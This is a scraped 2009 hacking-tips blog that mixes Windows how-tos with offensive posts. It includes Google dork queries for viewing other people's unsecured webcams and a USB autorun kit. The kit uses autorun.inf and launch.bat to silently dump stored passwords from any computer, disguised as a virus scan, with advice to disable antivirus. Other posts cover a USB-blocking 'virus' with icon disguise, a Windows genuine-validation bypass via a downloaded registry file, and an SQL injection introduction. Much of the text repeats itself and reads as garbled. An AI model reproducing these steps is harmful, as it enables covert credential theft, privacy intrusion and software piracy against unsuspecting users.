Your Ad Here

Wednesday, December 9, 2009

Hack web cameras on internet online

The main thing you have to do to hack the web cameras on internet is go to www.google.co.in and then type the code given below in the search box:(without quotes) the quote is given simply to understand the code starting and ending.

“inurl:/view/index.shtml” and press enter

then you will get list of some website showing the IP addresses and some link like that actually they are the web cameras link on the internet.

Please note one thing here- if u type the IP address of the computer in place of inurl when u type the code in the search box there then the web camera of that computer can be hacked directly means direct access if that pc is having web camera online.

For Ex. type in google search as

207.111.165.30/view/index.shtml to view web camera used at that ip address

the other google search links which makes web cameras publicly viewable are:

inurl:/view.shtml
intitle:”Live View / – AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”

Thursday, November 26, 2009

Changing boot logo in Windows 7

In Windows Vista, there was the possibility of an alternative splash screen to switch instead of the normal load bar that is displayed by Windows Vista. In Windows 7 boot screen is not available but may be the Windows logo that is displayed when launching Windows 7 be completely eliminated. In Windows 7 boot screen is not available but may be the Windows logo that is displayed when launching Windows 7 be completely eliminated. Once you choose to disable the logo is only a black screen. Once you choose to disable the logo is only a black screen.

Go to Start, click All Programs and then Accessories and select Run here. Then type msconfig and click OK. Then type msconfig and click OK. In the window that opens click on the tab "Start computer. In the window that opens click on the tab "Start computer. Click here for the tick in" Without UI to launch ", if you can show jusit information at startup, check also" Information about startup operating system to. Turn here for the tick in "Without UI to launch", if you can show jusit information at startup, check also "Information about operating system to startup.

Then press OK, the reboot as requested here is not necessary. The next time the computer starts the Windows logo will not appear. The next time the computer starts the Windows logo will not appear.

How to generate the passwords

Many users often have to be a simple password that is used also in several places such as the computer itself, Live Messenger and Google. It is always advisable in that regard for the safety for a strong password and set up a different password for each service so when your password may be overtaken by someone else not have direct access to all services that you use. It is always advisable in that regard for the safety for a strong password and set up a different password for each service so when your password may be over taken by someone else not have direct access to all services that you use.

Weak passwords
Examples of weak passwords include 12345678, qwerty, zxcvbn, asdfgh, ABCDEFG and other words with a clear sense of order as the names of parents, children / grandchildren, birth dates, etc. Examples of weak administrator passwords include 12345678, qwerty, zxcvbn , asdfgh, ABCDEFG and other words with a clear sense of order as the names of parents, children / grand children, birth dates, administrator etc.

Strong Passwords Strong passwords
Strong passwords have an outsider has no meaning and are difficult to guess. Strong passwords have no meaning for an outsider and they are harder to guess. The password easier to remember you can combine as names and birth dates. The password easier to remember you can combine as names and birth dates. Imagine you have a date of birth 14/02/1975 and pet named Kyra example you can make of it: # 12Kyra75. Imagine you have a date of birth 14/02/1975 and pet named Kyra example you can make of it: # 12Kyra75.

Key issues in creating and using a password:

1.The longer the better, try to keep at least 8 characters.
2.Use uppercase and lowercase letters and combine it with numbers and any special characters such as points and fences.
3.Change your password periodically, eg every 3 months.
4.Try a different password for each service used.
5.Keep an alternate email address is set to recover passwords.
6.Do not use the "Ask" option. You can often choose a question in this one password in order to recover your password. You can often choose a question in this one password in order to recover your password.
7.Note Phishing Mails.
8.Be careful when using other computers. If possible use in this case the private mode of the browser, almost all modern browsers have this as InPrivate Internet Explorer and Chrome Incognito mode. If possible use in this case the private mode of the browser, almost all modern browsers have this as InPrivate Internet Explorer and Chrome Incognito mode.
9.Important not to write passwords, nor store them in a text file. Want to save the passwords do pay attention that you do not file as "ABC.doc" where possible and protect the file so you must first enter a password for the document to open. Want to save the passwords do pay attention that you do not file as "ABC.doc" where possible and protect the file so you must first enter a password for the document to open.
10.Not to tell passwords to others.
11.May not save passwords in the browser, especially on other computers.

Make Slideshow as desktop background in Windows 7

There are several programs that allow you a slideshow as a desktop background set as the Webshots program, but may since Windows 7 Windows yourself. To own a slideshow set to click anywhere on the desktop, right-click "Personalize". To own a slideshow set to click anywhere on the desktop, right-click "Personalize". In the window that opens you see a list of topics, click here below and then click Desktop Background list opens with the wallpaper. In the window that opens you see a list of topics, click here below and then click Desktop Background list opens with the wallpaper.

Top of the window then a Browse button so a folder to select their own images instead of the default Windows wallpaper. Top of the window then a Browse button so a folder to select their own images instead of the default Windows wallpaper.

You can search the list by Determining Whether the picture should be included in the slideshow. To set this up go with the mouse over a thumbnail and click the checkbox to select a photo to be included in the slideshow. To set this up go with the mouse over a thumbnail and click the checkbox to select a photo to be included in the slideshow. Use the 'Select All' button at the top select all pictures at once. Use the 'Select All' button at the top select all pictures at once. The slideshow is automatically activated when multiple images are selected. The slideshow is automatically activated when multiple images are selected.

At the bottom you have the options for the slideshow itself. Under "Change picture every:" you determine the time after which a picture has to be changed. Under "Change picture every:" you determining the time after which a picture has to be changed. You need the ability to choose between 10 seconds up to one days. You need the ability to choose between 10 seconds up to one days. Next door is an option called "Random". Next door is an option called "Random". This pictures are displayed randomly and not in the default order in the list. This pictures are displayed randomly and not in the default order in the list.

For laptop users there is now an extra option available. By default the slideshow will be disabled when the laptop only uses the battery. By default the slideshow will be disabled when the laptop only uses the battery. Remove the tick if this road to the slideshow even then available. Remove the tick if this road to the slideshow here then available.

If the slideshow is enabled you can quickly change a photo by right clicking on the desktop and selecting "Next background. If the slideshow is enabled you can quickly change a photo by right clicking on the desktop and selecting "Next background.

Thursday, November 19, 2009

How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to Protect an Email Account from SPAM

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.

Where do these SPAM come from?

These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.

Why do spammers SPAM?

The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.

Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.

From where do SPAMmers get my email address?

On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.

Spammers also use the trick of creating Hoax Emails for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.

Is SPAMming legal?

Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.

How to protect my email account from getting SPAMmed?

The following methods can be used to combat email spam.

1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.

2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.

3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.

4. While posting your contact email address on your website use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.

5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use “Bcc” (blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.

Use Gmail Account to Send Emails from Multiple Addresses

In this post you can learn how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or to send emails, I have a solution here.

Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send emails from different addresses and receive emails for different addresses. Let’s take a simple example

Suppose you have three email addresses (email accounts)

1. hacking@gmail.com

2. hacking@yahoo.com

3. hacker@hotmail.com

You can integrate the emails hacking@yahoo.com and hacker@hotmail.com to hacking@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this.

1. Login to your gmail account.

2. Click on Settings at the top right corner.

3. Under Settings, click on Accounts tab.

4. Now you’ll see the first option “Send mail as:“

5. Under this option, click on Add another email address you own

6. Now a small new window will pop-up asking you to enter the details of your new email address.

7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.

8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Now when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.

Before you leave, note this, according to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you don’t have this advantage in Yahoo or other email providers.

A Virus Program to Disable USB Ports

This post will show you how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual use C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.

* block_usb.c (source code)
* unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in previous post - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer the previous post – How to Change the ICON of an EXE file (This step is also optional).

How to Change the ICON of an EXE file

Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.

For this purpose here is a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.

I’ll give you a step-by-step instruction on how to use this tool to change the icon.

1. Goto Shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).

2. Right-click on the exe file whose ICON is to be changed.

3. Now you will see the option Change Icon…Click on that option.

4. Now the Icon Changer program will open up.

5. Icon changer will search for all the ICONS on your system so that you can select any one of those.

6. Now select the ICON of your choice and click on SET.

7. Now a popup window will appear and ask you to select from either of these two options.

* Change embeded icon.
* Adjust Windows to display custom icon.

Select the first option (Change embeded icon).

8. You are done.The ICON get’s changed.

How to Compile C Programs

If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.
How to install Borland C++ compiler

1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.

Click Here >> CodeGear

2. After you download, run freecommandlinetools.exe. The default installation path would be

C:\Borland\BCC55
How to configure Borland C++ compiler

1. After you install Borland C++ compier, create two new Text Documents

2. Open the first New Text Document.txt file and add the following two lines into it

-I”c:\Borland\Bcc55\include”

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.

3. Open the second New Text Document (2).txt file and add the following line into it

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.

4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
How to compile the C source code (.C files)

1. You need to place the .C (example.c) file to be compiled in the following location

C:\Borland\BCC55\Bin

2. Now goto command prompt (Start->Run->type cmd->Enter)

3. Make the following path as the present working directory (use CD command)

C:\Borland\BCC55\Bin

4. To compile the file (example.c) use the following command

bcc32 example.c

5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).

6. Now you have successfully compiled the source code into an executable file(.exe file).

NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

Thursday, November 12, 2009

Make Windows Xp Genuine Forever

The most popular way? to make your Os genuine is to hunt up Genuine Operating system Product keys.

Note:Genuine keys can only be used once.If they are used on different computers having same Operating system they become non-genuine.

Note:All the steps below are to be followed using Internet explorer otherwise they wont work.

Step 1: Confirm your windows XP is Genuine or not ? by Clicking on the link below:
Go to Microsoft.com to validate

Step 2: On the right hand side you will find two options named “Validate Windows” and “Validate Office” Click on validate windows.

Step 3: You will find a pop up which will state”Did you notice the information Bar”Just tick mark the don’t show this message again box and click on Ok.

Step 4: On the top of your browser you will see the information bar where you will find the following text written”This site might require following ActiveX control…….”Click on the information bar and then click on install ActiveX control.

Step 5: Another pop up box will appear asking you whether you want to install this software.Click on Install.

Step 7:Now it will tell you that you are a victim of software counterfeit,this means that your copy is pirated.If it doesn’t then your windows copy is already genuine.

1 simple step to make it genuine.

Download this file from rapidshare.It makes minute changes in the registry so that your windows xp becomes genuine.

Here is the Link: Download the Registry File

Run the file. It will ask you for a confirmation regarding whether you want to run it or not.Click on yes.

Now try all as told to you i.e about how to validate your XP. After validating it will surely not tell you that your copy of XP is pirated. It’s will work and make it Genuine for you.

Try installing Wmp 11,Ie 7 or 8…..trying updating your XP !!! It's gonna work...

You have now got a Genuine xp.

Monday, November 9, 2009

India Toll Free Numbers / Customer Care Numbers List

I received this as an email forward, did not verify the numbers. I am not responsible for any errors in the list!

Airways
Indian Airlines – 1800 180 1407
Jet Airways – 1800 22 5522
SpiceJet – 1800 180 3333

Automobiles
Mahindra Scorpio – 1800 22 6006
Maruti – 1800 111 515
Tata Motors – 1800 22 5552
Windshield Experts – 1800 11 3636

Banks
ABN AMRO – 1800 11 2224
Axis Bank – 1860 425 8888
Canara Bank – 1800 44 6000
Citibank – 1800 44 2265
Corporatin Bank – 1800 443 555
Development Credit Bank – 1800 22 5769
HDFC Bank – 1800 227 227
ICICI Bank – 1800 333 499
ICICI Bank NRI – 1800 22 4848
IDBI Bank – 1800 11 6999
Indian Bank – 1800 425 1400
ING Vysya – 1800 44 9900
Kotak Mahindra Bank – 1800 22 6022
Lord Krishna Bank – 1800 11 2300
Punjab National Bank – 1800 122 222
State Bank of India – 1800 44 1955
Syndicate Bank – 1800 44 6655

Cell Phones
BenQ – 1800 22 08 08
Bird CellPhones – 1800 11 7700
Motorola MotoAssist – 1800 11 1211
Nokia – 3030 3838
Samsung – 1800110011
Sony Ericsson – 3901 1111

Computers/IT
Adrenalin – 1800 444 445
AMD – 1800 425 6664
Apple Computers – 1800 444 683
Canon – 1800 333 366
Cisco Systems – 1800 221 777
Compaq – HP – 1800 444 999
Data One Broadband – 1800 424 1800
Dell – 1800 425 9046
Epson – 1800 44 0011
eSys – 3970 0011
Genesis Tally Academy – 1800 444 888
HCL – 1800 180 8080
IBM – 1800 443 333
Lexmark – 1800 22 4477
Marshal’s Point – 1800 33 4488
Microsoft – 1800 111 100
Microsoft Virus Update – 1901 333 334

Seagate – 1800 180 1104
Symantec – 1800 44 5533
TVS Electronics – 1800 444 566
WeP Peripherals – 1800 44 6446
Wipro – 1800 333 312
xerox – 1800 180 1225
Zenith – 1800 222 004

Couriers/Packers & Movers
ABT Courier – 1800 44 8585
AFL Wizz – 1800 22 9696
Agarwal Packers & Movers – 1800 11 4321
Associated Packers P Ltd – 1800 21 4560
DHL – 1800 111 345
FedEx – 1800 22 6161
Goel Packers & Movers – 1800 11 3456
UPS – 1800 22 7171

Education
Edu Plus – 1800 444 000
Hindustan College – 1800 33 4438
NCERT – 1800 11 1265
Vellore Institute of Technology – 1800 441 555

Healthcare
Best on Health – 1800 11 8899
Dr Batras – 1800 11 6767
GlaxoSmithKline – 1800 22 8797
Johnson & Johnson – 1800 22 8111
Kaya Skin Clinic – 1800 22 5292
LifeCell – 1800 44 5323

Manmar Technologies – 1800 33 4420
Pfizer – 1800 442 442
Roche Accu-Chek – 1800 11 45 46
Rudraksha – 1800 21 4708
Varilux Lenses – 1800 44 8383
VLCC – 1800 33 1262

Home Appliances
Aiwa/Sony – 1800 11 1188
Anchor Switches – 1800 22 7979
Blue Star – 1800 22 2200
Bose Audio – 1800 11 2673
Bru Coffee Vending Machines – 1800 44 7171
Daikin Air Conditioners – 1800 444 222
DishTV – 1800 12 3474
Faber Chimneys – 1800 21 4595
Godrej – 1800 22 5511
Grundfos Pumps – 1800 33 4555

LG – 1901 180 9999
Philips – 1800 22 4422
Samsung – 1800 113 444
Sanyo – 1800 11 0101
Voltas – 1800 33 4546
WorldSpace Satellite Radio – 1800 44 5432

Hotel Reservations
GRT Grand – 1800 44 5500
InterContinental Hotels Group – 1800 111 000
Marriott – 1800 22 0044
Sarovar Park Plaza – 1800 111 222
Taj Holidays – 1800 111 825

Insurance
AMP Sanmar – 1800 44 2200
Aviva – 1800 33 2244
Bajaj Allianz – 1800 22 5858
Chola MS General Insurance – 1800 44 5544
HDFC Standard Life – 1800 227 227
LIC – 1800 33 4433
Max New York Life – 1800 33 5577
Royal Sundaram – 1800 33 8899
SBI Life Insurance – 1800 22 9090

Mattresses
Kurl-on – 1800 44 0404
Sleepwell – 1800 11 2266

Investments/Finance
CAMS – 1800 44 2267
Chola Mutual Fund – 1800 22 2300
Easy IPO’s – 3030 5757
Fidelity Investments – 1800 180 8000
Franklin Templeton Fund – 1800 425 4255
J M Morgan Stanley – 1800 22 0004
Kotak Mutual Fund – 1800 222 626
LIC Housing Finance – 1800 44 0005
SBI Mutual Fund – 1800 22 3040
Sharekhan – 1800 22 7500
Tata Mutual Fund – 1800 22 0101

Paints
Asian Paints Home Solutions – 1800 22 5678
Berger Paints Home Decor – 1800 33 8800

Teleshopping
Asian Sky Shop – 1800 22 1800
Jaipan Teleshoppe – 1800 11 5225
Tele Brands – 1800 11 8000
VMI Teleshopping – 1800 447 777
WWS Teleshopping – 1800 220 777

Travel
Club Mahindra Holidays – 1800 33 4539
Cox & Kings – 1800 22 1235
God TV Tours – 1800 442 777
Kerala Tourism – 1800 444 747
Kumarakom Lake Resort – 1800 44 5030
Raj Travels & Tours – 1800 22 9900
Sita Tours – 1800 111 911
SOTC Tours – 1800 22 3344

UPS
APC – 1800 44 4272
Numeric – 1800 44 3266

Others
Consumer Helpline – 1800 11 4000
L’Or?al, GARNIeR – 1800 223 000
KONE Elevator – 1800 444 666
Indane – 1800 44 51 15
Aavin – 1800 44 3300
Pedigree – 1800 11 2121
Kodak India – 1800 22 8877
Domino’s Pizza – 1800 111 123
World Vision India – 1800 444 550
Telecom Monitoring Cell – 1800 110 420

Did these numbers work for you? Let me know in comments page. BTW, updated the numbers from 1600* to 1800*

Megaupload Trick - download without countdown or captchas

If you want to download from Megaupload without captchas or countdown timers, here is a trick worth trying out. It helps to convert megaupload links into direct download links.
Megaupload Direct Download Link Generator

If you are having a download link from megaupload like

http://www.megaupload.com/?d=GVOMXHQ2

then convert it to

http://www.megaupload.com/mgr_dl.php?d=GVOMXHQ2

That is, just replace “/?” of the original download URL with "/mgr_dl.php?" just after the ".com/"

You can place this direct link in download managers for immediate downloads from megaupload.

No Coundown

No Captchas

Maximum Speed

Google Account Password Recovery via SMS

It’s easy to forget, and now its easy to remind also. Google has now enabled password recovery through SMS service, which make sure that only you can access your account. So if you forget your password, you can reset it using a recovery code which Google send in a text message to your mobile phone.

According to Google, following mobile carriers supports account recovery via SMS in India.

* Aircel Cellular Limited
* Bharat Sanchar Nigam Limited
* Bharti Airtel Limited
* BPL Mobile Communications Limited
* IDEA Cellular Limited
* Reliance Telecom Limited
* Spice Communications Limited
* Vodafone

But, currently this feature is enabled for Google users in the United States only. It is expected to have this feature enabled very soon for other countries that support the SMS services, including India.

To set up password recovery via your mobile phone, just sign in to your account and click Change Password Recovery Options. Select your country if listed in the drop down, enter your mobile phone number and current password and then click Save. If you lose access to your account for any reason, you’ll be able to regain access by entering a code Google send in a text message.

To send yourself a recovery code via SMS, enter your username on the password-assistance page. After completing the word verification, you’ll receive confirmation that Google has sent a code to your phone. Keep this page open so you can get to the page where you enter your code. Check your phone for a text message from Google. Enter your recovery code and click Submit recovery code. Type your new password. And now your new password is in effect.

Sunday, November 8, 2009

How to get rid of Captcha on Orkut – When Posting an image

As we know orkut does not allow us to post images to anyone but our friends .Even if we post an image to our friend we have to go through the annoying captcha (captcha is a spam remover technique in which you have to type the distorted words from an image) .Captcha really gets on our nerve when we are posting image Greetings on New year or Christmas .Well these problems are of course not very awesome .Considering Orkut is one of the leading Social networking sites in the world .

Well on to the image business .Orkut does not display image on any community threads or non friend scraps. And there is an idea to get pass this .There are “non animated really not cool” Smileys in orkut which will appear when we type [:D] ,[:X],[:)] and so on .But most of the Orkut users are not satisfied with this .

The first thing the orkut checks when we input an image link is , That the link is a honest one or not .The honest links are those links which are provided from google services.For example if we add an embed code from myspace videos to a community thread , nothing will happen but when it comes to youtube the video will pop up because the youtube is a google service.So we need to find image hosting service of google (images from blogger ie. the links starts with 4.bp.blog…. is not a honest link – I don’t know why!).

Google’s Picture hosting site is http://picasaweb.google.com .Anything we upload on Picasa will appear on your friend’s scrap book with out asking you for Captcha .And it will appear on any community or a non friend’s Scrapbook with captcha . So if you see a nice looking Image on any site (it has to be a picture file like .gif .jpg .png .bmp etc “|.swf won’t do“)

Do the following

1. Login to Picasa with your google account -create an account if you don’t have one already .note: if you have a blog you can see your uploaded pictures to blogger there! .
2. Download your favorite smiley set on to yourcomputer .
3. Click upload on picasa select a album or create one .
4. Upload the Smiley to picasa .
5. Click the album which contains your Image.
6. Click on smiley.
7. After its completely loaded Right click on it ->Copy link location (or address).
8. Now post it on your friends Scrapbook ….. See no captcha!!!!

You can also upload your New year wishes picture on it and use some Scarp all software to send the greetings to all of your friends.

Google adsense for your wordpress theme (Part 1)

In this tutorial you are going to learn how to tweak your wordpress theme and place google adsense ads or ads from any other network in your wordpress blog.

Best positions to place ads:

If you have a three column template the best positions for adsense ads would be a 160*600 banner in the sidebar , a 160*90 linked unit above the 160*600 banner and large rectangle or 468* 60 ad unit just after the title of your post and at the end of your post.

If you have a 2 column template the best positions are a square linked unit in the side bar and a large rectangle or 468*60 ad unit just after the title of your post and at the end of your post. If your theme is wide enough to accommodate a 768*90 ad then use it before and after your post.

How to choose the colours of your Google ads:

Try to match the Google ads with the content of your site. Set the title color of your ad as the title colour, text colour as the color of your content and link color as the links in your content. Have the background and border same as your theme background.

A small tip on getting the exact colour codes:

Take a screen shot of your blog (Use print screen key on your keyboard) and open photo shop, select new press ctr+v and then use the color picker to get the exact colour codes



Let’s go on with the actual part:

First decide how many types (linked unit, large rectangle, lead board etc) of ads you want to display.

For Example if you decide to place the following ad units in your wordpress blog

· Horizontal linked ad unit

· 468*60 ad unit and

· 460*60 referral unit

Open notepad, paste the adsense code for horizontal linked unit in note pad and save it as horilinked.inc

Note: Don’t forget to select all types when saving the file in windows.

Repeat the above step for all the ad units and upload those files to wp-content>themes>XXXX

(In case your theme name is XXXX)

Removing Autorun.inf without any tool

This post shows you that how to remove the residing autorun.inf file even you cleared all the viruses in your pendrive or local drives. This file makes the drives not when we try to open it or when we try to rename the drive it won’t. This file is used by most of the virus authors to reside there work even after the user remove all the viruses from their computer. This file give lots of annoiences. Basically it usally used to call or run the viruses frequently. This file can also be used to work as i said above. To remove this type of files from your computer do the following steps:-

1. Click start and then run
2. Type cmd to open up the command prompt.
3. Change your directory to any on off your directory by using syntax driveletter: For example d:
4. Then type the command attrib in the prompt it display the list of executable files in the current directory.
5. Check whether autorun.inf file is present or not.
6. If not then you are lucky.
7. If present then you have to follow all the following steps to remove that file.
8. First you have to remove the power it is having for ex read only attribute etc…
9. The attribute depends on viruses.
10. One common step to remove all its properties is type the following command in the command prompt:- attrib -s -h -r autorun.inf
11. -s to remove its system attribute, -h to remove its hidden attribute and -r to remove the read only attribute.
12. You can use this steps to remove any of the files which has this properties.
13. Remember before doing the above steps you have to remove all the viruses form your computer. I recommend avast home edition which is free and 100% perfect. If you haven’t clean the viruses first clean it because after you delete this file it will automatically creates it without your knowledge.
14. Then type the following command:- del autorun.inf.
15. Now you have successfully deleted the file after you deleted the file restart your computer or remove your pendrive and plug it again.

In this way you can remove that file.

SQL Injection : Ultimate method for Website Hacking.

SQL Injection basically means to execute a query in the database which is connected to the website to get personal information out of it, which is not visible to a normal user. Database is most likely to be a part of the websites, which saves all the information like user names, passwords, posts, replies in it. So there is a possibility that you might put some commands or queries or requests whatever you want to call it into the database to get some hidden information out of it.

